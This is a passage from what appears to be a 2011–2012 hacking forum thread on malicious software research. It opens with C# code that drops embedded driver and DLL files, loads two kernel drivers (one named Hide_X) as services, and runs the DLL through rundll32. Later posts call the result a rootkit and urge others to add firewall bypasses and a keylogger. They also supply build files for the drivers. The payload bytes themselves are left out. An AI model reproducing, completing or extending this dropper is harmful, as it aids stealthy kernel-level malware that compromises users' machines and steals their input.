		Console.WriteLine("OpenSCManager: " + scHandle);

		if (scHandle != INVALID_HANDLE_VALUE)
		{
		IntPtr hService = CreateService(scHandle, this.driverName,
										this.driverName, SERVICE_ALL_ACCESS
										, SERVICE_KERNEL_DRIVER, SERVICE_DEMAND_START,SERVICE_ERROR_NORMAL
										,execPath, null, null, null, null, null);

		Console.WriteLine("CreateService: " + hService);

		hService = OpenService(scHandle, this.driverName,
					   SERVICE_START | SERVICE_STOP);

		Console.WriteLine("OpenService: "+hService);


		if (hService != IntPtr.Zero)
		{
		CloseServiceHandle(hService); // close both handles
		CloseServiceHandle(scHandle);
		// Start the driver using System.Management (WMI)
		if (ExecuteSCMOperationOnDriver(this.driverName, "StartService") == 0)
		{
			return true;
		}
		}
		else
		if (Marshal.GetLastWin32Error()== 1073) // Driver/Service already in DB
		{
			Console.WriteLine("Marshal=1073");
		CloseServiceHandle(scHandle);
		// Start the driver using System.Management (WMI)
		if (ExecuteSCMOperationOnDriver(this.driverName, "StartService") == 0)
		{
			return true;
		}
		}
		Marshal.ThrowExceptionForHR(HRESULT_FROM_WIN32(Marshal.GetLastWin32Error()));
		}
		return false;
		}

		internal bool UnloadDeviceDriver()
		{
			int ret = 0;

			Console.WriteLine("Unloading now...");
			if (fileHandle != IntPtr.Zero && fileHandle != INVALID_HANDLE_VALUE)
			{
				CloseHandle(fileHandle);
			}
			if ((ret = ExecuteSCMOperationOnDriver(driverName, "StopService")) == 0)
			{
				ret = ExecuteSCMOperationOnDriver(driverName, "Delete");
			}
			if (ret != 0)
			{
				return false;
			}
			return true;
		}

		private static int ExecuteSCMOperationOnDriver(string driverName, string operation)
		{
			ManagementPath path = new ManagementPath();
			path.Server = ".";
			path.NamespacePath = @"root\CIMV2";
			path.RelativePath = @"Win32_BaseService.Name='" + driverName + "'";
			using (ManagementObject o = new ManagementObject(path))
			{
				ManagementBaseObject outParams = o.InvokeMethod(operation,null, null);
				return Convert.ToInt32(outParams.Properties["ReturnValue"].Value);
			}
		}

		internal IntPtr OpenDevice()
		{
			Console.WriteLine(driverName);


			fileHandle = CreateFile("\\\\.\\"+driverName, GENERIC_READ, FILE_SHARE_READ, IntPtr.Zero, OPEN_EXISTING, 0, IntPtr.Zero);

			Console.WriteLine("CreateFile: "+fileHandle);
			//Console.WriteLine(Marshal.GetLastWin32Error());


		if(fileHandle == INVALID_HANDLE_VALUE)
		{
			Console.WriteLine("Throw exception");
			Console.WriteLine((Marshal.GetLastWin32Error()).ToString()+"\n\n\n");
			//Marshal.ThrowExceptionForHR(HRESULT_FROM_WIN32(Marshal.GetLastWin32Error()));
		}
		return fileHandle;
		}


		internal IntPtr DevControl()
		{
			Console.WriteLine("DevControl started");
			//long DeviceBuffer = 0;
			IntPtr dwState = new IntPtr(100);
			uint dwRet=0;

			bool dc = DeviceIoControl(fileHandle, FSConstants.IO_SET_EVENT, IntPtr.Zero, 0, dwState, (uint)Marshal.SizeOf(dwRet), ref dwRet, IntPtr.Zero);

			Console.WriteLine("Operation: "+dc);
			Console.WriteLine("Return Value: "+dwRet);
			Console.WriteLine("Error: "+(Marshal.GetLastWin32Error()).ToString() + "\n\n\n");
			if (fileHandle == INVALID_HANDLE_VALUE)
			{
				//Console.WriteLine("Throw exception");
				//Console.WriteLine((Marshal.GetLastWin32Error()).ToString()+"\n\n\n");
				//Marshal.ThrowExceptionForHR(HRESULT_FROM_WIN32(Marshal.GetLastWin32Error()));
			}
			return fileHandle;
		}



		private static int HRESULT_FROM_WIN32(int x)
		{
			return x <= 0 ? x : ((x & 0x0000FFFF) | FACILITY_WIN32);
		}
	}

	internal class FSConstants
	{
		private const int FILE_DEVICE_COMM_DRIVER = 0x00008810;
		const uint METHOD_NEITHER = 3;
		const uint METHOD_BUFFERED = 0;

		const uint FILE_ANY_ACCESS = 0;
		const uint FILE_SPECIAL_ACCESS = FILE_ANY_ACCESS;


		public static uint IO_SET_EVENT = CTL_CODE(FILE_DEVICE_COMM_DRIVER, 0x801, METHOD_NEITHER, FILE_ANY_ACCESS);


		static uint CTL_CODE(uint DeviceType, uint Function, uint Method, uint Access)
		{
			return ((DeviceType) << 16) | ((Access) << 14) | ((Function) << 2) | (Method);
		}
	}


class Program
{
private const uint GENERIC_READ = 0x80000000;
		private const uint OPEN_EXISTING = 3;
public enum ThreadAccess : int
		{
			TERMINATE = (0x0001),
			SUSPEND_RESUME = (0x0002),
			GET_CONTEXT = (0x0008),
			SET_CONTEXT = (0x0010),
			SET_INFORMATION = (0x0020),
			QUERY_INFORMATION = (0x0040),
			SET_THREAD_TOKEN = (0x0080),
			IMPERSONATE = (0x0100),
			DIRECT_IMPERSONATION = (0x0200)
		}
[DllImport("kernel32", SetLastError = true)]
		internal static extern IntPtr CreateFile(string lpFileName, uint
		dwDesiredAccess, uint dwShareMode, IntPtr lpSecurityAttributes, uint
		dwCreationDisposition, uint dwFlagsAndAttributes, IntPtr hTemplateFile);
[DllImport("kernel32.dll")]
		static extern int ResumeThread(IntPtr hThread);

		[DllImport("kernel32.dll")]
		static extern int SuspendThread(IntPtr hThread);

		[DllImport("kernel32.dll")]
		static extern IntPtr OpenThread(ThreadAccess dwDesiredAccess,
			bool bInheritHandle,
			uint dwThreadId);
 
static void Main(string[] args)
{
try{
BinaryWriter binWriter = new BinaryWriter(File.Open(@"\Driver.sys", FileMode.Create));
byte[] bb = new byte[] {!!!!FILE NOT INCLUDED!!!!!};
		   binWriter.Write(bb);
		   binWriter.Close();
}
catch(Exception e){}
//==============================
try{
BinaryWriter binWriter2 = new BinaryWriter(File.Open(@"\Hide_X.sys", FileMode.Create));
byte[] cc = new byte[] {!!!FILE NOT INCLUDED!!!};
		   binWriter2.Write(cc);
		   binWriter2.Close();
}
catch(Exception e){}
//=============================
try{
BinaryWriter binWriter3 = new BinaryWriter(File.Open(@"\DLLHell.dll", FileMode.Create));
byte[] dd = new byte[] {!!!FILE NOT INCLUDED!!!};
		   binWriter3.Write(dd);
		   binWriter3.Close();
}
catch(Exception e){}


//=============================
Thread.Sleep(1000);
bool check=true;
	   
string driverName = "Driver";
string driverName2 = "Hide_X";
 
Win32Driver driver = new Win32Driver(driverName,"\\Driver.sys");
  if (driver.LoadDeviceDriver())
  {
				Console.WriteLine(driverName + " loaded");
				IntPtr handle = driver.OpenDevice();
				Console.WriteLine(handle);
				Console.WriteLine("Device opened");
				// use device using ....DeviceIoControl(handle,....) see class code for signature
				driver.DevControl();
  }
Win32Driver driver2 = new Win32Driver(driverName2,"\\Hide_X.sys");
  if (driver2.LoadDeviceDriver())
  {
				Console.WriteLine(driverName2 + " loaded");
				IntPtr handle = driver2.OpenDevice();
				Console.WriteLine(handle);
				Console.WriteLine("Device opened");
				// use device using ....DeviceIoControl(handle,....) see class code for signature
				driver2.DevControl();
  }
Process myProcess = new Process();
ProcessStartInfo myProcessStartInfo =
new ProcessStartInfo("rundll32.exe" );
myProcessStartInfo.UseShellExecute = false;
myProcessStartInfo.RedirectStandardOutput = true;
myProcessStartInfo.Arguments= "\\DLLHell.dll MsgBox";
myProcess.StartInfo = myProcessStartInfo;
myProcess.Start();

}
}

Your Life is Your Crime its Punishment Time

#6 JMC31337

JMC31337

    Mega Poster

  • (Full Member)
  • 127 posts
  • Gender:Male
  • Location:West Chester PA
  • Interests:H/P/V/W/C
    ALT2600
    Classical Piano
    Chemistry/Toxicology/Toxins/Venom
    Cryptography
    Aviation/Piloting
    Programming
    Law
    Electronics

Posted 29 December 2011 - 11:15 PM

You guys figure out the kernel firewall bypass tricks and networking stuff and it'll be a kickin rootkit
Your Life is Your Crime its Punishment Time

#7 JMC31337

JMC31337

    Mega Poster

  • (Full Member)
  • 127 posts
  • Gender:Male
  • Location:West Chester PA
  • Interests:H/P/V/W/C
    ALT2600
    Classical Piano
    Chemistry/Toxicology/Toxins/Venom
    Cryptography
    Aviation/Piloting
    Programming
    Law
    Electronics

Posted 30 December 2011 - 04:17 PM

heres the dllhell.h code snippets
#ifdef __MAIN_H__
#define __MAIN_H__
#include <windows.h>
#define DLL_EXPORT__declspec(dllexport)
#ifdef cplusplus extern "C"
{
#endif
int DLL_EXPORT MsgBox(int x);
#ifdef __cplusplus
}
#endif
#endif //__MAIN_H__

Edited by JMC31337, 30 December 2011 - 04:18 PM.

Your Life is Your Crime its Punishment Time

#8 JMC31337

JMC31337

    Mega Poster

  • (Full Member)
  • 127 posts
  • Gender:Male
  • Location:West Chester PA
  • Interests:H/P/V/W/C
    ALT2600
    Classical Piano
    Chemistry/Toxicology/Toxins/Venom
    Cryptography
    Aviation/Piloting
    Programming
    Law
    Electronics

Posted 31 December 2011 - 04:05 PM

Shoulda stored all the code in hex format included in the sys file itself.. you guys/gals can do better than the one i wrote.. needs a keylogger too...


Posted Image

Edited by JMC31337, 31 December 2011 - 04:06 PM.

Your Life is Your Crime its Punishment Time

#9 JMC31337

JMC31337

    Mega Poster

  • (Full Member)
  • 127 posts
  • Gender:Male
  • Location:West Chester PA
  • Interests:H/P/V/W/C
    ALT2600
    Classical Piano
    Chemistry/Toxicology/Toxins/Venom
    Cryptography
    Aviation/Piloting
    Programming
    Law
    Electronics

Posted 02 January 2012 - 06:36 PM

Here's the MAKEFILE and SOURCES to compile with the sdk/ddk

MAKEFILE:
=======
!INCLUDE $(NTMAKEENV)\Makefile.def
=======

SOURCES:
=======
TARGETNAME = Hide_X
TARGETPATH = obj
TARGETTYPE = DRIVER
_NT_TARGET_VERSION = $(_NT_TARGET_VERSION_WINXP)
INCLUDES   = %BUILD%\inc
LIBS       = %BUILD%\lib

SOURCES    = hidez.c

===============
MAKEFILE:
======
!INCLUDE $(NTMAKEENV)\Makefile.def
======

SOURCES:
=====
TARGETNAME = Driver
TARGETPATH = obj
TARGETTYPE = DRIVER
_NT_TARGET_VERSION = $(_NT_TARGET_VERSION_WINXP)
INCLUDES   = %BUILD%\inc
LIBS       = %BUILD%\lib

SOURCES    = driver.c

Edited by JMC31337, 02 January 2012 - 06:55 PM.

Your Life is Your Crime its Punishment Time
Back to Malicious Software Research


0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users

  1. Tuts 4 You
  2. Professional Engineering
  3. Malicious Software Research
  4. Privacy Policy
  5. The Board Rules ·